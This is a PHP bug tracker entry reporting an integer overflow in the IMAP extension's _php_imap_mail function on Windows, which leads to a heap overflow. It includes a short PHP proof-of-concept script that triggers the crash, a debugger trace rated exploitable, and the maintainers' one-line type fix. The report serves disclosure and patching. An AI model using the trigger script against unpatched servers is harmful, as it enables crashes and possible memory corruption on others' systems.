php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #73418 Integer Overflow in "_php_imap_mail" leads Heap Overflow
Submitted: 2016-10-30 10:41 UTC Modified: 2017-02-13 00:59 UTC
From: orange at chroot dot org Assigned: stas (profile)
Status: Closed Package: IMAP related
PHP Version: 5.6 OS: Windows
Private report: No CVE-ID: None
 [2016-10-30 10:41 UTC] orange at chroot dot org
Description:
------------
Hi

I just review the code of PHP7 and I found an Integer Overflow in function _php_imap_mail.

The implementation of _php_imap_mail is OS-independent, the bug is only occurs in Windows platform.

In file ext/imap/php_imap.c line 3953.

```
3953	bufferHeader = (char *)emalloc(bufferLen + 1);
3954	memset(bufferHeader, 0, bufferLen);
```

bufferLen is declared as type int. But the argument's type of emalloc is size_f. So if we provide bufferLen 0xffffffff, emalloc will create a memory with zero byte, and next line, memset will set 0xffffffff bytes to NULL.

I think the patch is just change the type of bufferLen from int to size_t!



Test script:
---------------
<?php
    ini_set("memory_limit", "-1");

    $subject = 'x';
    $message = 'x';

    $g = (0xffffffff - 12);
    $to = str_repeat("x", $g/3 );
    $header = str_repeat("x", $g/3 );
    $cc =  str_repeat("x", $g/3 );

    imap_mail($to, $subject, $message, $header, $cc);

Actual result:
--------------
0:000> kb
 # RetAddr           : Args to Child                                                           : Call Site
00 00007ffe`032d7e35 : 00000000`ffffffff 00007ffd`f3ef3453 00000221`bc600000 00000000`55600000 : VCRUNTIME140!memset+0x49
01 00007ffe`032d864f : 00000221`66e00040 00000221`66e56418 00000221`66e56418 00000221`67000018 : php_imap!_php_imap_mail+0xa5 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\ext\imap\php_imap.c @ 3955]
02 00007ffd`f3efadd3 : 00000221`66e56400 00000221`66e6a3e0 00000221`00000000 00000221`66e56400 : php_imap!zif_imap_mail+0x14f [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\ext\imap\php_imap.c @ 4115]
03 (Inline Function) : --------`-------- --------`-------- --------`-------- --------`-------- : php7!ZEND_DO_ICALL_SPEC_HANDLER+0x3f [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\zend\zend_vm_execute.h @ 586]
04 00007ffd`f3f1d54c : 00000000`ffffffff 00000000`00000000 00000221`66e7e000 000000c5`bb3ff560 : php7!execute_ex+0x143 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\zend\zend_vm_execute.h @ 417]
05 00007ffd`f3f1d339 : 00000221`66e5c480 000000c5`bb3ff560 00000000`00000001 00000000`00000001 : php7!zend_execute+0x16c [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\zend\zend_vm_execute.h @ 459]
06 00007ffd`f3f1d1a7 : 00000000`00000008 00000000`00000000 000000c5`00000003 00000000`00000000 : php7!zend_execute_scripts+0x119 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\zend\zend.c @ 1428]
07 00007ff6`83f91c12 : 00000000`00000000 00000221`66e03018 00000221`66e73200 00000221`66e03030 : php7!php_execute_script+0x477 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\main\main.c @ 2494]
08 00007ff6`83f91483 : 00000000`00000000 00000000`00000000 00007ff6`83f91560 00000000`00000000 : php!do_cli+0x692 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\sapi\cli\php_cli.c @ 975]
09 00007ff6`83f92629 : 00000000`00000000 00000000`00000000 00007ffe`27a369f8 00000000`00000000 : php!main+0x3d3 [c:\php-sdk\php70dev\vc14\x64\php-7.0.12\sapi\cli\php_cli.c @ 1344]
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\System32\KERNEL32.DLL - 
0a (Inline Function) : --------`-------- --------`-------- --------`-------- --------`-------- : php!invoke_main+0x22 [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 64]
0b 00007ffe`29b88364 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : php!__scrt_common_main_seh+0x11d [f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl @ 253]
0c 00007ffe`2a655e91 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0d 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-10-30 10:49 UTC] orange at chroot dot org
Windbg Exploitable Extension Result:

0:000> !exploitable

!exploitable 1.6.0.0
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\System32\KERNEL32.DLL - 
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at VCRUNTIME140!memset+0x0000000000000049 (Hash=0x9665fc5c.0xce03d94a)

User mode write access violations that are not near NULL are exploitable.
 [2016-11-03 14:35 UTC] orange at chroot dot org
ping?
 [2016-11-03 16:12 UTC] ab@php.net
-Status: Open +Status: Verified
 [2016-11-03 16:12 UTC] ab@php.net
Thanks for the report. The fix is indeed to just use the correct datatype

--- a/ext/imap/php_imap.c
+++ b/ext/imap/php_imap.c
@@ -3934,7 +3934,7 @@ int _php_imap_mail(char *to, char *subject, char *message, char *headers, char *
        char *tsm_errmsg = NULL;
        ADDRESS *addr;
        char *bufferTo = NULL, *bufferCc = NULL, *bufferBcc = NULL, *bufferHeader = NULL;
-       int offset, bufferLen = 0;
+       size_t offset, bufferLen = 0;
        size_t bt_len;

        if (headers) {


This is applied in the security branches for the upcoming 5.6 and 7.0+ releases as 99b242a6d093bca1f64084866b4491061de57553 and de643586dee986ff16c0a6be44813687786aa781.

Thanks.
 [2016-11-03 16:13 UTC] ab@php.net
-PHP Version: 7.0.12 +PHP Version: 5.6
 [2016-11-04 05:58 UTC] stas@php.net
-Status: Verified +Status: Closed -Assigned To: +Assigned To: stas
 [2016-11-04 05:58 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-11-04 06:26 UTC] orange at chroot dot org
Wow, thanks!

One more question, can you assign a CVE for this?
 [2016-11-05 22:53 UTC] ab@php.net
The new security issues classification is being discussed currently https://wiki.php.net/security 

But how it looks like, this issue is of the low severity according to the current classification. I've just pushed into security repo out of caution. But we likely to handle the issues of this kind the way, so it's pushed right into the public repository in the future. This is likely not an issue deserving a CVE therefore.

Thanks.
 [2016-11-06 09:31 UTC] orange at chroot dot org
OK, thanks :)
 [2016-11-08 10:18 UTC] ab@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=99b242a6d093bca1f64084866b4491061de57553
Log: Fixed bug #73418 Integer Overflow in &quot;_php_imap_mail&quot; leads to crash
 [2016-11-08 10:18 UTC] ab@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=de643586dee986ff16c0a6be44813687786aa781
Log: Fixed bug #73418 Integer Overflow in &quot;_php_imap_mail&quot; leads to crash
 [2016-11-08 12:04 UTC] ab@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=35df4b1ae3cc9a3df4e99565037cee204280332e
Log: Fixed bug #73418 Integer Overflow in &quot;_php_imap_mail&quot; leads to crash
 [2016-11-09 01:37 UTC] tyrael@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=b823b14e374251ad6ab437a9631e4b010ca09b68
Log: Fixed bug #73418 Integer Overflow in &quot;_php_imap_mail&quot; leads to crash
 [2016-11-09 03:33 UTC] krakjoe@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=de643586dee986ff16c0a6be44813687786aa781
Log: Fixed bug #73418 Integer Overflow in &quot;_php_imap_mail&quot; leads to crash
 [2016-11-09 03:33 UTC] krakjoe@php.net
Automatic comment on behalf of ab
Revision: http://git.php.net/?p=php-src.git;a=commit;h=99b242a6d093bca1f64084866b4491061de57553
Log: Fixed bug #73418 Integer Overflow in &quot;_php_imap_mail&quot; leads to crash
 [2017-02-13 00:59 UTC] stas@php.net
-Type: Security +Type: Bug
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Fri Mar 29 12:01:27 2024 UTC